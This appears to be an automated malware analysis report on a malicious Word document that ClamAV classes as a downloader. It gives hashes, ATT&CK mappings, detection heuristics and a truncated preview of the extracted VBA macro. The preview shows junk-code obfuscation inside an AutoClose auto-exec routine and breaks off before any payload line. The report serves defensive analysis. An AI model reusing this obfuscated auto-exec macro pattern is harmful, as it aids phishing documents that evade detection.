Office (OLE) malware analysis — malicious · d9cda7cb7f3e8843

MALICIOUS

Office (OLE)

272.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 3672eecfa4bbd50a376be910f7ae72f6 SHA-1: 572521b68898ccc7b07c944d0787d5c8aa4e2737 SHA-256: d9cda7cb7f3e88435ac0f6ff65111aa0cec63f7a632b782a554c93bb698a64b9

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoClose event and uses GetObject, indicating an attempt to execute code. ClamAV identifies this as Doc.Downloader.Valyria-6595163-0, suggesting its primary function is to download and execute a secondary payload. The presence of a VBA macro strongly suggests it was delivered as a spearphishing attachment.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 84405 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	84405 bytes
SHA-256: `9caf581e2b2dbd95063962b0b37f9c60569a0e58a1149d76a6460204eb3c49f6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub TRogowUggeCUB() Debug.Print "quzuTutIHEV" Dim qEpiFupcUdATiKUQacexiQE qEpiFupcUdATiKUQacexiQE = Log(4) qEpiFupcUdATiKUQacexiQE = qEpiFupcUdATiKUQacexiQE + Log(13) Dim GoPeUxoMirhyvuduzyXuX GoPeUxoMirhyvuduzyXuX = Rnd(112) If GoPeUxoMirhyvuduzyXuX > 35824 Then GoPeUxoMirhyvuduzyXuX = Exp(2) End If HUmixucynUsAxkuQOafy = 17431 Dim LEDEKOPYNuw qiNitorAtUw = 57399 HIDEDuQyVazAkYX = InStr("nAriByCoFeXYxum", "nAriByCoFeXYxumnAriByCoFeXYxum") LEDEKOPYNuw = Rnd(113) Dim NoxiDOzUsOHu NoxiDOzUsOHu = Rnd(1210) If NoxiDOzUsOHu > 64484 Then NoxiDOzUsOHu = Exp(10) End If If LEDEKOPYNuw > 45424 Then jAxzYNoMIwIw = InStr("pIcAHOsUMAcitUT", "pIcAHOsUMAcitUTpIcAHOsUMAcitUT") QuKHlUGazgymObibYt = 57721 LEDEKOPYNuw = Exp(3) vYmevyVySWezEvYBOzAJem = InStr("jiSUToGIliojeKIMUr", "jiSUToGIliojeKIMUrjiSUToGIliojeKIMUr") zakORadYmixei = 44345 End If PIvexquairiheFytuCONc = Val("8537.7") & "FYvoZeXEWASIXIC" bEWediuWaNePiwU = Val("96741.8") & "qizyfytOLydYDINIVU" Dim UtYRyNaCEhYvuPOvILoH UtYRyNaCEhYvuPOvILoH = Rnd(136) If UtYRyNaCEhYvuPOvILoH > 13397 Then UtYRyNaCEhYvuPOvILoH = Exp(6) End If Dim pObeTuLoHxIxENEsIheZAH For pObeTuLoHxIxENEsIheZAH = 7 To 13 bOZyZuWyPYsAiqecETE = Val("93980.6") & "cuqUdaTEbisuHuGE" Dim wuaaBIGEgoSXaqlUrAq wuaaBIGEgoSXaqlUrAq = Fix(49017) Dim JyxebyZuziJIZ JyxebyZuziJIZ = Log(7) JyxebyZuziJIZ = JyxebyZuziJIZ + Log(13) Dim QufoMuZYGIvegoV QufoMuZYGIvegoV = Rnd(135) If QufoMuZYGIvegoV > 63765 Then QufoMuZYGIvegoV = Exp(5) End If Next kiiAxadizAvYsypYaPaZe = InStr("rOgUlYzIaeTEQUPIXfId", "rOgUlYzIaeTEQUPIXfIdrOgUlYzIaeTEQUPIXfId") Dim bIDefoRYLeaesImi For bIDefoRYLeaesImi = 2 To 12 Dim ZAZOlAaCinufatrIZUBUHo ZAZOlAaCinufatrIZUBUHo = Fix(76244) Next xYHiQogyKuGgUnAcuN = Val("60251.10") & "VYMyHuZudesIxAwIJIwA" Dim namyiODTfUkabA namyiODTfUkabA = Log(6) namyiODTfUkabA = namyiODTfUkabA + Log(10) ZEtusyXOcAMUNUFea = 98457 End Sub Sub AutoClose() SeRahOluiINUwOzuX = Val("92360.4") & "kEnoBohunEmYW" Dim XIDuxilUSaRYiiaoHIz For XIDuxilUSaRYiiaoHIz = 8 To 11 Dim fURAiUleaOMaMetAX fURAiUleaOMaMetAX = Fix(94668) Next Dim vYMoROQuCeneDyV vYMoROQuCeneDyV = Log(4) bEVUjOGOJajO = InStr("BIXOpUlIKepYB", "BIXOpUlIKepYBBIXOpUlIKepYB") ZixisyHexiVoiumOw = Val("506.7") & "hoFeDEpygeLAzUSyVavAmib" vYMoROQuCeneDyV = vYMoROQuCeneDyV + Log(11) On Error Resume Next LibywUQyTyL = Val("62944.8") & "qikYbwAsysOSEiegIGE" Dim opEtAGYLYx For opEtAGYLYx = 7 To 12 Dim tesosiPygyTEKaHAxOfa tesosiPygyTEKaHAxOfa = Fix(80502) Next Dim kUkANOFuNehIqHypEJyRidA WIbuHacuPYtaSE = Val("44302.6") & "aiBYpyqYioLAjewyDEPyTUn" Dim BAferZYVazEkiNjuRaBY BAferZYVazEkiNjuRaBY = Log(6) BAferZYVazEkiNjuRaBY = BAferZYVazEkiNjuRaBY + Log(12) kUkANOFuNehIqHypEJyRidA = Log(8) kUkANOFuNehIqHypEJyRidA = kUkANOFuNehIqHypEJyRidA + Log(10) Debug.Print "JYJESabUwaCudYvoL" Dim ZiPalujopuDeVSE For ZiPalujopuDeVSE = 1 To 13 Dim FYfyQeXyMIX FYfyQeXyMIX = Fix(36647) Next Dim kuoPehiZidYf kuoPehiZidYf = Rnd(124) If kuoPehiZidYf > 8670 Then kuoPehiZidYf = Exp(4) End If OsoDamlurIzyLeriLeR = InStr("YLeZixoSYmfePIT", "YLeZixoSYmfePITYLeZixoSYmfePIT") hEGAluFeayrAJ = InStr("gyteFYtErAzOwSeBU", "gyteFYtErAzOwSeBUgyteFYtErAzOwSeBU") vaXilAWiCyTuSOQuJepIcusA = InStr("HIiUdEFiYDuVUXIKAwoMIJ", "HIiUdEFiYDuVUXIKAwoMIJHIiUdEFiYDuVUXIKAwoMIJ") Dim RoGEMATozUkiG For RoGEMATozUkiG = 2 To 11 Dim HIwamiMYrosypeNYC HIwamiMYrosypeNYC = Fix(6751) Next xoSESEkErmiQHevY = vbNullString Dim laPUDinYQEp laPUDinYQEp = Log(1) laPUDinYQEp = laPUDinYQEp + Log(13) Debug.Print "xazYkYnmIZuJaEcosubI" Dim TuHeFyJfyHaHibyaEPOl LozUwurOgipY = Val("11561.9") & "tULyxafOBeLadEWig" joYvALkUvEKiWExol = InStr("NuNOhVYcIcUVAKegEfo", "NuNOhVYcIcUVAKegEfo ... (truncated)

SHA-256: 9caf581e2b2dbd95063962b0b37f9c60569a0e58a1149d76a6460204eb3c49f6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TRogowUggeCUB()
Debug.Print "quzuTutIHEV"
Dim qEpiFupcUdATiKUQacexiQE
qEpiFupcUdATiKUQacexiQE = Log(4)

qEpiFupcUdATiKUQacexiQE = qEpiFupcUdATiKUQacexiQE + Log(13)
Dim GoPeUxoMirhyvuduzyXuX
GoPeUxoMirhyvuduzyXuX = Rnd(112)
If GoPeUxoMirhyvuduzyXuX > 35824 Then
   GoPeUxoMirhyvuduzyXuX = Exp(2)
End If

HUmixucynUsAxkuQOafy = 17431
Dim LEDEKOPYNuw
qiNitorAtUw = 57399
HIDEDuQyVazAkYX = InStr("nAriByCoFeXYxum", "nAriByCoFeXYxumnAriByCoFeXYxum")
LEDEKOPYNuw = Rnd(113)
Dim NoxiDOzUsOHu
NoxiDOzUsOHu = Rnd(1210)
If NoxiDOzUsOHu > 64484 Then
   NoxiDOzUsOHu = Exp(10)
End If
If LEDEKOPYNuw > 45424 Then
jAxzYNoMIwIw = InStr("pIcAHOsUMAcitUT", "pIcAHOsUMAcitUTpIcAHOsUMAcitUT")
QuKHlUGazgymObibYt = 57721
   LEDEKOPYNuw = Exp(3)
vYmevyVySWezEvYBOzAJem = InStr("jiSUToGIliojeKIMUr", "jiSUToGIliojeKIMUrjiSUToGIliojeKIMUr")
zakORadYmixei = 44345
End If
PIvexquairiheFytuCONc = Val("8537.7") & "FYvoZeXEWASIXIC"

bEWediuWaNePiwU = Val("96741.8") & "qizyfytOLydYDINIVU"
Dim UtYRyNaCEhYvuPOvILoH
UtYRyNaCEhYvuPOvILoH = Rnd(136)
If UtYRyNaCEhYvuPOvILoH > 13397 Then
   UtYRyNaCEhYvuPOvILoH = Exp(6)
End If
Dim pObeTuLoHxIxENEsIheZAH
For pObeTuLoHxIxENEsIheZAH = 7 To 13
bOZyZuWyPYsAiqecETE = Val("93980.6") & "cuqUdaTEbisuHuGE"
   Dim wuaaBIGEgoSXaqlUrAq
   wuaaBIGEgoSXaqlUrAq = Fix(49017)
Dim JyxebyZuziJIZ
JyxebyZuziJIZ = Log(7)

JyxebyZuziJIZ = JyxebyZuziJIZ + Log(13)
Dim QufoMuZYGIvegoV
QufoMuZYGIvegoV = Rnd(135)
If QufoMuZYGIvegoV > 63765 Then
   QufoMuZYGIvegoV = Exp(5)
End If
Next
kiiAxadizAvYsypYaPaZe = InStr("rOgUlYzIaeTEQUPIXfId", "rOgUlYzIaeTEQUPIXfIdrOgUlYzIaeTEQUPIXfId")
Dim bIDefoRYLeaesImi
For bIDefoRYLeaesImi = 2 To 12
   Dim ZAZOlAaCinufatrIZUBUHo
   ZAZOlAaCinufatrIZUBUHo = Fix(76244)
Next
xYHiQogyKuGgUnAcuN = Val("60251.10") & "VYMyHuZudesIxAwIJIwA"
Dim namyiODTfUkabA
namyiODTfUkabA = Log(6)

namyiODTfUkabA = namyiODTfUkabA + Log(10)
ZEtusyXOcAMUNUFea = 98457
End Sub
Sub AutoClose()
SeRahOluiINUwOzuX = Val("92360.4") & "kEnoBohunEmYW"
Dim XIDuxilUSaRYiiaoHIz
For XIDuxilUSaRYiiaoHIz = 8 To 11
   Dim fURAiUleaOMaMetAX
   fURAiUleaOMaMetAX = Fix(94668)
Next
Dim vYMoROQuCeneDyV
vYMoROQuCeneDyV = Log(4)

bEVUjOGOJajO = InStr("BIXOpUlIKepYB", "BIXOpUlIKepYBBIXOpUlIKepYB")
ZixisyHexiVoiumOw = Val("506.7") & "hoFeDEpygeLAzUSyVavAmib"
vYMoROQuCeneDyV = vYMoROQuCeneDyV + Log(11)
On Error Resume Next

LibywUQyTyL = Val("62944.8") & "qikYbwAsysOSEiegIGE"
Dim opEtAGYLYx
For opEtAGYLYx = 7 To 12
   Dim tesosiPygyTEKaHAxOfa
   tesosiPygyTEKaHAxOfa = Fix(80502)
Next
Dim kUkANOFuNehIqHypEJyRidA
WIbuHacuPYtaSE = Val("44302.6") & "aiBYpyqYioLAjewyDEPyTUn"
Dim BAferZYVazEkiNjuRaBY
BAferZYVazEkiNjuRaBY = Log(6)

BAferZYVazEkiNjuRaBY = BAferZYVazEkiNjuRaBY + Log(12)
kUkANOFuNehIqHypEJyRidA = Log(8)

kUkANOFuNehIqHypEJyRidA = kUkANOFuNehIqHypEJyRidA + Log(10)
Debug.Print "JYJESabUwaCudYvoL"
Dim ZiPalujopuDeVSE
For ZiPalujopuDeVSE = 1 To 13
   Dim FYfyQeXyMIX
   FYfyQeXyMIX = Fix(36647)
Next

Dim kuoPehiZidYf
kuoPehiZidYf = Rnd(124)
If kuoPehiZidYf > 8670 Then
   kuoPehiZidYf = Exp(4)
End If
OsoDamlurIzyLeriLeR = InStr("YLeZixoSYmfePIT", "YLeZixoSYmfePITYLeZixoSYmfePIT")
hEGAluFeayrAJ = InStr("gyteFYtErAzOwSeBU", "gyteFYtErAzOwSeBUgyteFYtErAzOwSeBU")
vaXilAWiCyTuSOQuJepIcusA = InStr("HIiUdEFiYDuVUXIKAwoMIJ", "HIiUdEFiYDuVUXIKAwoMIJHIiUdEFiYDuVUXIKAwoMIJ")
Dim RoGEMATozUkiG
For RoGEMATozUkiG = 2 To 11
   Dim HIwamiMYrosypeNYC
   HIwamiMYrosypeNYC = Fix(6751)
Next
xoSESEkErmiQHevY = vbNullString
Dim laPUDinYQEp
laPUDinYQEp = Log(1)

laPUDinYQEp = laPUDinYQEp + Log(13)
Debug.Print "xazYkYnmIZuJaEcosubI"
Dim TuHeFyJfyHaHibyaEPOl
LozUwurOgipY = Val("11561.9") & "tULyxafOBeLadEWig"
joYvALkUvEKiWExol = InStr("NuNOhVYcIcUVAKegEfo", "NuNOhVYcIcUVAKegEfo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.